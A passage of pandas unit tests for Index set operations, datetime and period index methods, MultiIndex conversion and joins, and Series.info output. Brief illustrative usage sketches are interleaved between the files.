result = idx.union(idx[:1])
tm.assert_index_equal(result, idx)
# sort=None
with tm.assert_produces_warning(RuntimeWarning):
result = idx.union(idx[:1], sort=None)
tm.assert_index_equal(result, idx)
# sort=False
result = idx.union(idx[:1], sort=False)
tm.assert_index_equal(result, idx)
@pytest.mark.xfail(reason="GH#25151 need to decide on True behavior")
def test_union_sort_other_incomparable_true(self):
# TODO(GH#25151): decide on True behaviour
# sort=True
idx = Index([1, pd.Timestamp("2000")])
with pytest.raises(TypeError, match=".*"):
idx.union(idx[:1], sort=True)
@pytest.mark.xfail(reason="GH#25151 need to decide on True behavior")
def test_intersection_equal_sort_true(self):
# TODO(GH#25151): decide on True behaviour
idx = Index(["c", "a", "b"])
sorted_ = Index(["a", "b", "c"])
tm.assert_index_equal(idx.intersection(idx, sort=True), sorted_)
def test_intersection_base(self, sort):
# (same results for py2 and py3 but sortedness not tested elsewhere)
index = Index([0, "a", 1, "b", 2, "c"])
first = index[:5]
second = index[:3]
expected = Index([0, 1, "a"]) if sort is None else Index([0, "a", 1])
result = first.intersection(second, sort=sort)
tm.assert_index_equal(result, expected)
@pytest.mark.parametrize("klass", [np.array, Series, list])
def test_intersection_different_type_base(self, klass, sort):
# GH 10149
index = Index([0, "a", 1, "b", 2, "c"])
first = index[:5]
second = index[:3]
result = first.intersection(klass(second.values), sort=sort)
assert tm.equalContents(result, second)
def test_intersection_nosort(self):
result = Index(["c", "b", "a"]).intersection(["b", "a"])
expected = Index(["b", "a"])
tm.assert_index_equal(result, expected)
def test_intersection_equal_sort(self):
idx = Index(["c", "a", "b"])
tm.assert_index_equal(idx.intersection(idx, sort=False), idx)
tm.assert_index_equal(idx.intersection(idx, sort=None), idx)
def test_intersection_str_dates(self, sort):
dt_dates = [datetime(2012, 2, 9), datetime(2012, 2, 22)]
i1 = Index(dt_dates, dtype=object)
i2 = Index(["aa"], dtype=object)
result = i2.intersection(i1, sort=sort)
assert len(result) == 0
@pytest.mark.parametrize(
"index2,expected_arr",
[(Index(["B", "D"]), ["B"]), (Index(["B", "D", "A"]), ["A", "B"])],
)
def test_intersection_non_monotonic_non_unique(self, index2, expected_arr, sort):
# non-monotonic non-unique
index1 = Index(["A", "B", "A", "C"])
expected = Index(expected_arr, dtype="object")
result = index1.intersection(index2, sort=sort)
if sort is None:
expected = expected.sort_values()
tm.assert_index_equal(result, expected)
def test_difference_base(self, sort):
# (same results for py2 and py3 but sortedness not tested elsewhere)
index = Index([0, "a", 1, "b", 2, "c"])
first = index[:4]
second = index[3:]
result = first.difference(second, sort)
expected = Index([0, "a", 1])
if sort is None:
expected = Index(safe_sort(expected))
tm.assert_index_equal(result, expected)
def test_symmetric_difference(self):
# (same results for py2 and py3 but sortedness not tested elsewhere)
index = Index([0, "a", 1, "b", 2, "c"])
first = index[:4]
second = index[3:]
result = first.symmetric_difference(second)
expected = Index([0, 1, 2, "a", "c"])
tm.assert_index_equal(result, expected)
@pytest.mark.parametrize(
"method,expected,sort",
[
(
"intersection",
np.array(
[(1, "A"), (2, "A"), (1, "B"), (2, "B")],
dtype=[("num", int), ("let", "a1")],
),
False,
),
(
"intersection",
np.array(
[(1, "A"), (1, "B"), (2, "A"), (2, "B")],
dtype=[("num", int), ("let", "a1")],
),
None,
),
(
"union",
np.array(
[(1, "A"), (1, "B"), (1, "C"), (2, "A"), (2, "B"), (2, "C")],
dtype=[("num", int), ("let", "a1")],
),
None,
),
],
)
def test_tuple_union_bug(self, method, expected, sort):
index1 = Index(
np.array(
[(1, "A"), (2, "A"), (1, "B"), (2, "B")],
dtype=[("num", int), ("let", "a1")],
)
)
index2 = Index(
np.array(
[(1, "A"), (2, "A"), (1, "B"), (2, "B"), (1, "C"), (2, "C")],
dtype=[("num", int), ("let", "a1")],
)
)
result = getattr(index1, method)(index2, sort=sort)
assert result.ndim == 1
expected = Index(expected)
tm.assert_index_equal(result, expected)
@pytest.mark.parametrize("first_list", [["b", "a"], []])
@pytest.mark.parametrize("second_list", [["a", "b"], []])
@pytest.mark.parametrize(
"first_name, second_name, expected_name",
[("A", "B", None), (None, "B", None), ("A", None, None)],
)
def test_union_name_preservation(
self, first_list, second_list, first_name, second_name, expected_name, sort
):
first = Index(first_list, name=first_name)
second = Index(second_list, name=second_name)
union = first.union(second, sort=sort)
vals = set(first_list).union(second_list)
if sort is None and len(first_list) > 0 and len(second_list) > 0:
expected = Index(sorted(vals), name=expected_name)
tm.assert_index_equal(union, expected)
else:
expected = Index(vals, name=expected_name)
tm.equalContents(union, expected)
@pytest.mark.parametrize(
"diff_type, expected",
[["difference", [1, "B"]], ["symmetric_difference", [1, 2, "B", "C"]]],
)
def test_difference_object_type(self, diff_type, expected):
# GH 13432
idx1 = Index([0, 1, "A", "B"])
idx2 = Index([0, 2, "A", "C"])
result = getattr(idx1, diff_type)(idx2)
expected = Index(expected)
tm.assert_index_equal(result, expected)
```
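A compact sketch of the `sort` semantics exercised above, using arbitrary string labels; note that the rejection of `sort=True` reflects the pandas version these tests target and has been relaxed in later releases.

```python
import pandas as pd

left = pd.Index(["c", "b", "a"])
right = pd.Index(["b", "d"])

# sort=None (the default) returns a sorted result when the values allow it.
assert list(left.union(right)) == ["a", "b", "c", "d"]

# sort=False keeps the values in order of first appearance instead.
assert list(left.union(right, sort=False)) == ["c", "b", "a", "d"]

# In the pandas version targeted by these tests, sort=True is rejected
# outright; newer releases accept it, so treat this branch as optional.
try:
    left.union(right, sort=True)
except ValueError as err:
    assert "sort" in str(err)
```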
#### File: indexes/datetimelike_/test_is_monotonic.py
```python
from pandas import (
Index,
NaT,
date_range,
)
def test_is_monotonic_with_nat():
# GH#31437
# PeriodIndex.is_monotonic should behave analogously to DatetimeIndex,
# in particular never be monotonic when we have NaT
dti = date_range("2016-01-01", periods=3)
pi = dti.to_period("D")
tdi = Index(dti.view("timedelta64[ns]"))
for obj in [pi, pi._engine, dti, dti._engine, tdi, tdi._engine]:
if isinstance(obj, Index):
# i.e. not Engines
assert obj.is_monotonic
assert obj.is_monotonic_increasing
assert not obj.is_monotonic_decreasing
assert obj.is_unique
dti1 = dti.insert(0, NaT)
pi1 = dti1.to_period("D")
tdi1 = Index(dti1.view("timedelta64[ns]"))
for obj in [pi1, pi1._engine, dti1, dti1._engine, tdi1, tdi1._engine]:
if isinstance(obj, Index):
# i.e. not Engines
assert not obj.is_monotonic
assert not obj.is_monotonic_increasing
assert not obj.is_monotonic_decreasing
assert obj.is_unique
dti2 = dti.insert(3, NaT)
pi2 = dti2.to_period("H")
tdi2 = Index(dti2.view("timedelta64[ns]"))
for obj in [pi2, pi2._engine, dti2, dti2._engine, tdi2, tdi2._engine]:
if isinstance(obj, Index):
# i.e. not Engines
assert not obj.is_monotonic
assert not obj.is_monotonic_increasing
assert not obj.is_monotonic_decreasing
assert obj.is_unique
```
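Restated directly on a DatetimeIndex, the NaT rule from the test above looks like this (dates arbitrary):

```python
import pandas as pd

dti = pd.date_range("2016-01-01", periods=3)
assert dti.is_monotonic_increasing

# Inserting NaT anywhere breaks monotonicity in both directions, because
# NaT never compares as ordered against real timestamps ...
with_nat = dti.insert(0, pd.NaT)
assert not with_nat.is_monotonic_increasing
assert not with_nat.is_monotonic_decreasing

# ... while uniqueness is unaffected.
assert with_nat.is_unique
```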
#### File: datetimes/methods/test_isocalendar.py
```python
from pandas import (
DataFrame,
DatetimeIndex,
)
import pandas._testing as tm
def test_isocalendar_returns_correct_values_close_to_new_year_with_tz():
# GH#6538: Check that DatetimeIndex and its Timestamp elements
# return the same isocalendar values close to the new year with a timezone
dates = ["2013/12/29", "2013/12/30", "2013/12/31"]
dates = DatetimeIndex(dates, tz="Europe/Brussels")
result = dates.isocalendar()
expected_data_frame = DataFrame(
[[2013, 52, 7], [2014, 1, 1], [2014, 1, 2]],
columns=["year", "week", "day"],
index=dates,
dtype="UInt32",
)
tm.assert_frame_equal(result, expected_data_frame)
```
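A quick sketch of the year-boundary behaviour the test checks (requires a pandas release with `DatetimeIndex.isocalendar`, roughly 1.1 onwards): the last days of December 2013 already fall into ISO week 1 of 2014, timezone or not.

```python
import pandas as pd

dates = pd.DatetimeIndex(["2013-12-29", "2013-12-30", "2013-12-31"],
                         tz="Europe/Brussels")

iso = dates.isocalendar()

# 2013-12-29 is still week 52 of 2013; the next two days are already
# week 1 of ISO year 2014.
assert iso["year"].tolist() == [2013, 2014, 2014]
assert iso["week"].tolist() == [52, 1, 1]
assert iso["day"].tolist() == [7, 1, 2]
```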
#### File: indexes/datetimes/test_asof.py
```python
from datetime import timedelta
from pandas import (
Index,
Timestamp,
date_range,
isna,
)
import pandas._testing as tm
class TestAsOf:
def test_asof_partial(self):
index = date_range("2010-01-01", periods=2, freq="m")
expected = Timestamp("2010-02-28")
result = index.asof("2010-02")
assert result == expected
assert not isinstance(result, Index)
def test_asof(self):
index = tm.makeDateIndex(100)
dt = index[0]
assert index.asof(dt) == dt
assert isna(index.asof(dt - timedelta(1)))
dt = index[-1]
assert index.asof(dt + timedelta(1)) == dt
dt = index[0].to_pydatetime()
assert isinstance(index.asof(dt), Timestamp)
```
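For reference, a minimal sketch of the partial-string lookup exercised by test_asof_partial:
```python
from pandas import date_range

idx = date_range("2010-01-01", periods=2, freq="M")  # month-end stamps
idx.asof("2010-02")  # Timestamp('2010-02-28 00:00:00'), per the test above
```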
#### File: indexes/multi/test_conversion.py
```python
import numpy as np
import pytest
import pandas as pd
from pandas import (
DataFrame,
MultiIndex,
)
import pandas._testing as tm
def test_to_numpy(idx):
result = idx.to_numpy()
exp = idx.values
tm.assert_numpy_array_equal(result, exp)
def test_to_frame():
tuples = [(1, "one"), (1, "two"), (2, "one"), (2, "two")]
index = MultiIndex.from_tuples(tuples)
result = index.to_frame(index=False)
expected = DataFrame(tuples)
tm.assert_frame_equal(result, expected)
result = index.to_frame()
expected.index = index
tm.assert_frame_equal(result, expected)
tuples = [(1, "one"), (1, "two"), (2, "one"), (2, "two")]
index = MultiIndex.from_tuples(tuples, names=["first", "second"])
result = index.to_frame(index=False)
expected = DataFrame(tuples)
expected.columns = ["first", "second"]
tm.assert_frame_equal(result, expected)
result = index.to_frame()
expected.index = index
tm.assert_frame_equal(result, expected)
# See GH-22580
index = MultiIndex.from_tuples(tuples)
result = index.to_frame(index=False, name=["first", "second"])
expected = DataFrame(tuples)
expected.columns = ["first", "second"]
tm.assert_frame_equal(result, expected)
result = index.to_frame(name=["first", "second"])
expected.index = index
expected.columns = ["first", "second"]
tm.assert_frame_equal(result, expected)
msg = "'name' must be a list / sequence of column names."
with pytest.raises(TypeError, match=msg):
index.to_frame(name="first")
msg = "'name' should have same length as number of levels on index."
with pytest.raises(ValueError, match=msg):
index.to_frame(name=["first"])
# Tests for datetime index
index = MultiIndex.from_product([range(5), pd.date_range("20130101", periods=3)])
result = index.to_frame(index=False)
expected = DataFrame(
{
0: np.repeat(np.arange(5, dtype="int64"), 3),
1: np.tile(pd.date_range("20130101", periods=3), 5),
}
)
tm.assert_frame_equal(result, expected)
result = index.to_frame()
expected.index = index
tm.assert_frame_equal(result, expected)
# See GH-22580
result = index.to_frame(index=False, name=["first", "second"])
expected = DataFrame(
{
"first": np.repeat(np.arange(5, dtype="int64"), 3),
"second": np.tile(pd.date_range("20130101", periods=3), 5),
}
)
tm.assert_frame_equal(result, expected)
result = index.to_frame(name=["first", "second"])
expected.index = index
tm.assert_frame_equal(result, expected)
def test_to_frame_dtype_fidelity():
# GH 22420
mi = MultiIndex.from_arrays(
[
pd.date_range("19910905", periods=6, tz="US/Eastern"),
[1, 1, 1, 2, 2, 2],
pd.Categorical(["a", "a", "b", "b", "c", "c"], ordered=True),
["x", "x", "y", "z", "x", "y"],
],
names=["dates", "a", "b", "c"],
)
original_dtypes = {name: mi.levels[i].dtype for i, name in enumerate(mi.names)}
expected_df = DataFrame(
{
"dates": pd.date_range("19910905", periods=6, tz="US/Eastern"),
"a": [1, 1, 1, 2, 2, 2],
"b": pd.Categorical(["a", "a", "b", "b", "c", "c"], ordered=True),
"c": ["x", "x", "y", "z", "x", "y"],
}
)
df = mi.to_frame(index=False)
df_dtypes = df.dtypes.to_dict()
tm.assert_frame_equal(df, expected_df)
assert original_dtypes == df_dtypes
def test_to_frame_resulting_column_order():
# GH 22420
expected = ["z", 0, "a"]
mi = MultiIndex.from_arrays(
[["a", "b", "c"], ["x", "y", "z"], ["q", "w", "e"]], names=expected
)
result = mi.to_frame().columns.tolist()
assert result == expected
def test_to_flat_index(idx):
expected = pd.Index(
(
("foo", "one"),
("foo", "two"),
("bar", "one"),
("baz", "two"),
("qux", "one"),
("qux", "two"),
),
tupleize_cols=False,
)
result = idx.to_flat_index()
tm.assert_index_equal(result, expected)
```
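A short usage sketch of the two conversions covered above (illustrative only):
```python
from pandas import MultiIndex

mi = MultiIndex.from_tuples([(1, "one"), (1, "two")], names=["num", "word"])
mi.to_frame(index=False)  # DataFrame with columns "num" and "word"
mi.to_flat_index()        # plain Index of tuples: [(1, 'one'), (1, 'two')]
```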
#### File: indexes/multi/test_join.py
```python
import numpy as np
import pytest
from pandas import (
Index,
Interval,
MultiIndex,
)
import pandas._testing as tm
@pytest.mark.parametrize(
"other", [Index(["three", "one", "two"]), Index(["one"]), Index(["one", "three"])]
)
def test_join_level(idx, other, join_type):
join_index, lidx, ridx = other.join(
idx, how=join_type, level="second", return_indexers=True
)
exp_level = other.join(idx.levels[1], how=join_type)
assert join_index.levels[0].equals(idx.levels[0])
assert join_index.levels[1].equals(exp_level)
# pare down levels
mask = np.array([x[1] in exp_level for x in idx], dtype=bool)
exp_values = idx.values[mask]
tm.assert_numpy_array_equal(join_index.values, exp_values)
if join_type in ("outer", "inner"):
join_index2, ridx2, lidx2 = idx.join(
other, how=join_type, level="second", return_indexers=True
)
assert join_index.equals(join_index2)
tm.assert_numpy_array_equal(lidx, lidx2)
tm.assert_numpy_array_equal(ridx, ridx2)
tm.assert_numpy_array_equal(join_index2.values, exp_values)
def test_join_level_corner_case(idx):
# some corner cases
index = Index(["three", "one", "two"])
result = index.join(idx, level="second")
assert isinstance(result, MultiIndex)
with pytest.raises(TypeError, match="Join.*MultiIndex.*ambiguous"):
idx.join(idx, level=1)
def test_join_self(idx, join_type):
joined = idx.join(idx, how=join_type)
tm.assert_index_equal(joined, idx)
def test_join_multi():
# GH 10665
midx = MultiIndex.from_product([np.arange(4), np.arange(4)], names=["a", "b"])
idx = Index([1, 2, 5], name="b")
# inner
jidx, lidx, ridx = midx.join(idx, how="inner", return_indexers=True)
exp_idx = MultiIndex.from_product([np.arange(4), [1, 2]], names=["a", "b"])
exp_lidx = np.array([1, 2, 5, 6, 9, 10, 13, 14], dtype=np.intp)
exp_ridx = np.array([0, 1, 0, 1, 0, 1, 0, 1], dtype=np.intp)
tm.assert_index_equal(jidx, exp_idx)
tm.assert_numpy_array_equal(lidx, exp_lidx)
tm.assert_numpy_array_equal(ridx, exp_ridx)
# flip
jidx, ridx, lidx = idx.join(midx, how="inner", return_indexers=True)
tm.assert_index_equal(jidx, exp_idx)
tm.assert_numpy_array_equal(lidx, exp_lidx)
tm.assert_numpy_array_equal(ridx, exp_ridx)
# keep MultiIndex
jidx, lidx, ridx = midx.join(idx, how="left", return_indexers=True)
exp_ridx = np.array(
[-1, 0, 1, -1, -1, 0, 1, -1, -1, 0, 1, -1, -1, 0, 1, -1], dtype=np.intp
)
tm.assert_index_equal(jidx, midx)
assert lidx is None
tm.assert_numpy_array_equal(ridx, exp_ridx)
# flip
jidx, ridx, lidx = idx.join(midx, how="right", return_indexers=True)
tm.assert_index_equal(jidx, midx)
assert lidx is None
tm.assert_numpy_array_equal(ridx, exp_ridx)
def test_join_self_unique(idx, join_type):
if idx.is_unique:
joined = idx.join(idx, how=join_type)
assert (idx == joined).all()
def test_join_multi_wrong_order():
# GH 25760
# GH 28956
midx1 = MultiIndex.from_product([[1, 2], [3, 4]], names=["a", "b"])
midx2 = MultiIndex.from_product([[1, 2], [3, 4]], names=["b", "a"])
join_idx, lidx, ridx = midx1.join(midx2, return_indexers=True)
exp_ridx = np.array([-1, -1, -1, -1], dtype=np.intp)
tm.assert_index_equal(midx1, join_idx)
assert lidx is None
tm.assert_numpy_array_equal(ridx, exp_ridx)
def test_join_multi_return_indexers():
# GH 34074
midx1 = MultiIndex.from_product([[1, 2], [3, 4], [5, 6]], names=["a", "b", "c"])
midx2 = MultiIndex.from_product([[1, 2], [3, 4]], names=["a", "b"])
result = midx1.join(midx2, return_indexers=False)
tm.assert_index_equal(result, midx1)
def test_join_overlapping_interval_level():
# GH 44096
idx_1 = MultiIndex.from_tuples(
[
(1, Interval(0.0, 1.0)),
(1, Interval(1.0, 2.0)),
(1, Interval(2.0, 5.0)),
(2, Interval(0.0, 1.0)),
(2, Interval(1.0, 3.0)), # interval limit is here at 3.0, not at 2.0
(2, Interval(3.0, 5.0)),
],
names=["num", "interval"],
)
idx_2 = MultiIndex.from_tuples(
[
(1, Interval(2.0, 5.0)),
(1, Interval(0.0, 1.0)),
(1, Interval(1.0, 2.0)),
(2, Interval(3.0, 5.0)),
(2, Interval(0.0, 1.0)),
(2, Interval(1.0, 3.0)),
],
names=["num", "interval"],
)
expected = MultiIndex.from_tuples(
[
(1, Interval(0.0, 1.0)),
(1, Interval(1.0, 2.0)),
(1, Interval(2.0, 5.0)),
(2, Interval(0.0, 1.0)),
(2, Interval(1.0, 3.0)),
(2, Interval(3.0, 5.0)),
],
names=["num", "interval"],
)
result = idx_1.join(idx_2, how="outer")
tm.assert_index_equal(result, expected)
```
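A condensed sketch of the single-level join exercised by test_join_multi above:
```python
import numpy as np
from pandas import Index, MultiIndex

midx = MultiIndex.from_product([np.arange(4), np.arange(4)], names=["a", "b"])
idx = Index([1, 2, 5], name="b")
# The inner join on the shared "b" level keeps only rows where b is 1 or 2.
joined, lidx, ridx = midx.join(idx, how="inner", return_indexers=True)
```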
#### File: period/methods/test_insert.py
```python
import numpy as np
import pytest
from pandas import (
NaT,
PeriodIndex,
period_range,
)
import pandas._testing as tm
class TestInsert:
@pytest.mark.parametrize("na", [np.nan, NaT, None])
def test_insert(self, na):
# GH#18295 (test missing)
expected = PeriodIndex(["2017Q1", NaT, "2017Q2", "2017Q3", "2017Q4"], freq="Q")
result = period_range("2017Q1", periods=4, freq="Q").insert(1, na)
tm.assert_index_equal(result, expected)
```
#### File: period/methods/test_is_full.py
```python
import pytest
from pandas import PeriodIndex
def test_is_full():
index = PeriodIndex([2005, 2007, 2009], freq="A")
assert not index.is_full
index = PeriodIndex([2005, 2006, 2007], freq="A")
assert index.is_full
index = PeriodIndex([2005, 2005, 2007], freq="A")
assert not index.is_full
index = PeriodIndex([2005, 2005, 2006], freq="A")
assert index.is_full
index = PeriodIndex([2006, 2005, 2005], freq="A")
with pytest.raises(ValueError, match="Index is not monotonic"):
index.is_full
assert index[:0].is_full
```
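The property under test, in two lines (a minimal sketch):
```python
from pandas import PeriodIndex

PeriodIndex([2005, 2006, 2007], freq="A").is_full  # True: consecutive years
PeriodIndex([2005, 2007, 2009], freq="A").is_full  # False: 2006 and 2008 are missing
```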
#### File: period/methods/test_to_timestamp.py
```python
from datetime import datetime
import numpy as np
import pytest
from pandas import (
DatetimeIndex,
NaT,
PeriodIndex,
Timedelta,
Timestamp,
date_range,
period_range,
)
import pandas._testing as tm
class TestToTimestamp:
def test_to_timestamp_non_contiguous(self):
# GH#44100
dti = date_range("2021-10-18", periods=9, freq="B")
pi = dti.to_period()
result = pi[::2].to_timestamp()
expected = dti[::2]
tm.assert_index_equal(result, expected)
result = pi._data[::2].to_timestamp()
expected = dti._data[::2]
# TODO: can we get the freq to round-trip?
tm.assert_datetime_array_equal(result, expected, check_freq=False)
result = pi[::-1].to_timestamp()
expected = dti[::-1]
tm.assert_index_equal(result, expected)
result = pi._data[::-1].to_timestamp()
expected = dti._data[::-1]
tm.assert_datetime_array_equal(result, expected, check_freq=False)
result = pi[::2][::-1].to_timestamp()
expected = dti[::2][::-1]
tm.assert_index_equal(result, expected)
result = pi._data[::2][::-1].to_timestamp()
expected = dti._data[::2][::-1]
tm.assert_datetime_array_equal(result, expected, check_freq=False)
def test_to_timestamp_freq(self):
idx = period_range("2017", periods=12, freq="A-DEC")
result = idx.to_timestamp()
expected = date_range("2017", periods=12, freq="AS-JAN")
tm.assert_index_equal(result, expected)
def test_to_timestamp_pi_nat(self):
# GH#7228
index = PeriodIndex(["NaT", "2011-01", "2011-02"], freq="M", name="idx")
result = index.to_timestamp("D")
expected = DatetimeIndex(
[NaT, datetime(2011, 1, 1), datetime(2011, 2, 1)], name="idx"
)
tm.assert_index_equal(result, expected)
assert result.name == "idx"
result2 = result.to_period(freq="M")
tm.assert_index_equal(result2, index)
assert result2.name == "idx"
result3 = result.to_period(freq="3M")
exp = PeriodIndex(["NaT", "2011-01", "2011-02"], freq="3M", name="idx")
tm.assert_index_equal(result3, exp)
assert result3.freqstr == "3M"
msg = "Frequency must be positive, because it represents span: -2A"
with pytest.raises(ValueError, match=msg):
result.to_period(freq="-2A")
def test_to_timestamp_preserve_name(self):
index = period_range(freq="A", start="1/1/2001", end="12/1/2009", name="foo")
assert index.name == "foo"
conv = index.to_timestamp("D")
assert conv.name == "foo"
def test_to_timestamp_quarterly_bug(self):
years = np.arange(1960, 2000).repeat(4)
quarters = np.tile(list(range(1, 5)), 40)
pindex = PeriodIndex(year=years, quarter=quarters)
stamps = pindex.to_timestamp("D", "end")
expected = DatetimeIndex([x.to_timestamp("D", "end") for x in pindex])
tm.assert_index_equal(stamps, expected)
assert stamps.freq == expected.freq
def test_to_timestamp_pi_mult(self):
idx = PeriodIndex(["2011-01", "NaT", "2011-02"], freq="2M", name="idx")
result = idx.to_timestamp()
expected = DatetimeIndex(["2011-01-01", "NaT", "2011-02-01"], name="idx")
tm.assert_index_equal(result, expected)
result = idx.to_timestamp(how="E")
expected = DatetimeIndex(["2011-02-28", "NaT", "2011-03-31"], name="idx")
expected = expected + Timedelta(1, "D") - Timedelta(1, "ns")
tm.assert_index_equal(result, expected)
def test_to_timestamp_pi_combined(self):
idx = period_range(start="2011", periods=2, freq="1D1H", name="idx")
result = idx.to_timestamp()
expected = DatetimeIndex(["2011-01-01 00:00", "2011-01-02 01:00"], name="idx")
tm.assert_index_equal(result, expected)
result = idx.to_timestamp(how="E")
expected = DatetimeIndex(
["2011-01-02 00:59:59", "2011-01-03 01:59:59"], name="idx"
)
expected = expected + Timedelta(1, "s") - Timedelta(1, "ns")
tm.assert_index_equal(result, expected)
result = idx.to_timestamp(how="E", freq="H")
expected = DatetimeIndex(["2011-01-02 00:00", "2011-01-03 01:00"], name="idx")
expected = expected + Timedelta(1, "h") - Timedelta(1, "ns")
tm.assert_index_equal(result, expected)
def test_to_timestamp_1703(self):
index = period_range("1/1/2012", periods=4, freq="D")
result = index.to_timestamp()
assert result[0] == Timestamp("1/1/2012")
```
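A brief sketch of the start/end conversions these tests cover (illustrative only):
```python
from pandas import period_range

pi = period_range("2017Q1", periods=4, freq="Q")
pi.to_timestamp()         # start-of-period timestamps (the default how="start")
pi.to_timestamp(how="E")  # end-of-period timestamps, as the how="E" cases above show
```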
#### File: io/formats/test_series_info.py
```python
from io import StringIO
from string import ascii_uppercase as uppercase
import textwrap
import numpy as np
import pytest
from pandas.compat import PYPY
from pandas import (
CategoricalIndex,
MultiIndex,
Series,
date_range,
)
def test_info_categorical_column_just_works():
n = 2500
data = np.array(list("abcdefghij")).take(np.random.randint(0, 10, size=n))
s = Series(data).astype("category")
s.isna()
buf = StringIO()
s.info(buf=buf)
s2 = s[s == "d"]
buf = StringIO()
s2.info(buf=buf)
def test_info_categorical():
# GH14298
idx = CategoricalIndex(["a", "b"])
s = Series(np.zeros(2), index=idx)
buf = StringIO()
s.info(buf=buf)
@pytest.mark.parametrize("verbose", [True, False])
def test_info_series(lexsorted_two_level_string_multiindex, verbose):
index = lexsorted_two_level_string_multiindex
ser = Series(range(len(index)), index=index, name="sth")
buf = StringIO()
ser.info(verbose=verbose, buf=buf)
result = buf.getvalue()
expected = textwrap.dedent(
"""\
<class 'pandas.core.series.Series'>
MultiIndex: 10 entries, ('foo', 'one') to ('qux', 'three')
"""
)
if verbose:
expected += textwrap.dedent(
"""\
Series name: sth
Non-Null Count Dtype
-------------- -----
10 non-null int64
"""
)
expected += textwrap.dedent(
f"""\
dtypes: int64(1)
memory usage: {ser.memory_usage()}.0+ bytes
"""
)
assert result == expected
def test_info_memory():
s = Series([1, 2], dtype="i8")
buf = StringIO()
s.info(buf=buf)
result = buf.getvalue()
memory_bytes = float(s.memory_usage())
expected = textwrap.dedent(
f"""\
<class 'pandas.core.series.Series'>
RangeIndex: 2 entries, 0 to 1
Series name: None
Non-Null Count Dtype
-------------- -----
2 non-null int64
dtypes: int64(1)
memory usage: {memory_bytes} bytes
"""
)
assert result == expected
def test_info_wide():
s = Series(np.random.randn(101))
msg = "Argument `max_cols` can only be passed in DataFrame.info, not Series.info"
with pytest.raises(ValueError, match=msg):
s.info(max_cols=1)
def test_info_shows_dtypes():
dtypes = [
"int64",
"float64",
"datetime64[ns]",
"timedelta64[ns]",
"complex128",
"object",
"bool",
]
n = 10
for dtype in dtypes:
s = Series(np.random.randint(2, size=n).astype(dtype))
buf = StringIO()
s.info(buf=buf)
res = buf.getvalue()
name = f"{n:d} non-null {dtype}"
assert name in res
@pytest.mark.skipif(PYPY, reason="on PyPy deep=True doesn't change result")
def test_info_memory_usage_deep_not_pypy():
s_with_object_index = Series({"a": [1]}, index=["foo"])
assert s_with_object_index.memory_usage(
index=True, deep=True
) > s_with_object_index.memory_usage(index=True)
s_object = Series({"a": ["a"]})
assert s_object.memory_usage(deep=True) > s_object.memory_usage()
@pytest.mark.skipif(not PYPY, reason="on PyPy deep=True does not change result")
def test_info_memory_usage_deep_pypy():
s_with_object_index = Series({"a": [1]}, index=["foo"])
assert s_with_object_index.memory_usage(
index=True, deep=True
) == s_with_object_index.memory_usage(index=True)
s_object = Series({"a": ["a"]})
assert s_object.memory_usage(deep=True) == s_object.memory_usage()
@pytest.mark.parametrize(
"series, plus",
[
(Series(1, index=[1, 2, 3]), False),
(Series(1, index=list("ABC")), True),
(Series(1, index=MultiIndex.from_product([range(3), range(3)])), False),
(
Series(1, index=MultiIndex.from_product([range(3), ["foo", "bar"]])),
True,
),
],
)
def test_info_memory_usage_qualified(series, plus):
buf = StringIO()
series.info(buf=buf)
if plus:
assert "+" in buf.getvalue()
else:
assert "+" not in buf.getvalue()
def test_info_memory_usage_bug_on_multiindex():
# GH 14308
# memory usage introspection should not materialize .values
N = 100
M = len(uppercase)
index = MultiIndex.from_product(
[list(uppercase), date_range("20160101", periods=N)],
names=["id", "date"],
)
s = Series(np.random.randn(N * M), index=index)
unstacked = s.unstack("id")
assert s.values.nbytes == unstacked.values.nbytes
assert s.memory_usage(deep=True) > unstacked.memory_usage(deep=True).sum()
# high upper bound
diff = unstacked.memory_usage(deep=True).sum() - s.memory_usage(deep=True)
assert diff < 2000
```
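A minimal sketch of the Series.info output format asserted in test_info_memory:
```python
from io import StringIO
from pandas import Series

s = Series([1, 2], dtype="i8")
buf = StringIO()
s.info(buf=buf)
print(buf.getvalue())  # includes "RangeIndex: 2 entries, 0 to 1" and a memory usage line
```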
#### File: pandas/tests/test_multilevel.py
```python
import numpy as np
import pytest
import pandas as pd
from pandas import (
DataFrame,
MultiIndex,
Series,
)
import pandas._testing as tm
AGG_FUNCTIONS = [
"sum",
"prod",
"min",
"max",
"median",
"mean",
"skew",
"mad",
"std",
"var",
"sem",
]
class TestMultiLevel:
def test_reindex_level(self, multiindex_year_month_day_dataframe_random_data):
# axis=0
ymd = multiindex_year_month_day_dataframe_random_data
with tm.assert_produces_warning(FutureWarning):
month_sums = ymd.sum(level="month")
result = month_sums.reindex(ymd.index, level=1)
expected = ymd.groupby(level="month").transform(np.sum)
tm.assert_frame_equal(result, expected)
# Series
result = month_sums["A"].reindex(ymd.index, level=1)
expected = ymd["A"].groupby(level="month").transform(np.sum)
tm.assert_series_equal(result, expected, check_names=False)
# axis=1
with tm.assert_produces_warning(FutureWarning):
month_sums = ymd.T.sum(axis=1, level="month")
result = month_sums.reindex(columns=ymd.index, level=1)
expected = ymd.groupby(level="month").transform(np.sum).T
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("opname", ["sub", "add", "mul", "div"])
def test_binops_level(
self, opname, multiindex_year_month_day_dataframe_random_data
):
ymd = multiindex_year_month_day_dataframe_random_data
op = getattr(DataFrame, opname)
with tm.assert_produces_warning(FutureWarning):
month_sums = ymd.sum(level="month")
result = op(ymd, month_sums, level="month")
broadcasted = ymd.groupby(level="month").transform(np.sum)
expected = op(ymd, broadcasted)
tm.assert_frame_equal(result, expected)
# Series
op = getattr(Series, opname)
result = op(ymd["A"], month_sums["A"], level="month")
broadcasted = ymd["A"].groupby(level="month").transform(np.sum)
expected = op(ymd["A"], broadcasted)
expected.name = "A"
tm.assert_series_equal(result, expected)
def test_reindex(self, multiindex_dataframe_random_data):
frame = multiindex_dataframe_random_data
expected = frame.iloc[[0, 3]]
reindexed = frame.loc[[("foo", "one"), ("bar", "one")]]
tm.assert_frame_equal(reindexed, expected)
def test_reindex_preserve_levels(
self, multiindex_year_month_day_dataframe_random_data
):
ymd = multiindex_year_month_day_dataframe_random_data
new_index = ymd.index[::10]
chunk = ymd.reindex(new_index)
assert chunk.index is new_index
chunk = ymd.loc[new_index]
assert chunk.index.equals(new_index)
ymdT = ymd.T
chunk = ymdT.reindex(columns=new_index)
assert chunk.columns is new_index
chunk = ymdT.loc[:, new_index]
assert chunk.columns.equals(new_index)
def test_groupby_transform(self, multiindex_dataframe_random_data):
frame = multiindex_dataframe_random_data
s = frame["A"]
grouper = s.index.get_level_values(0)
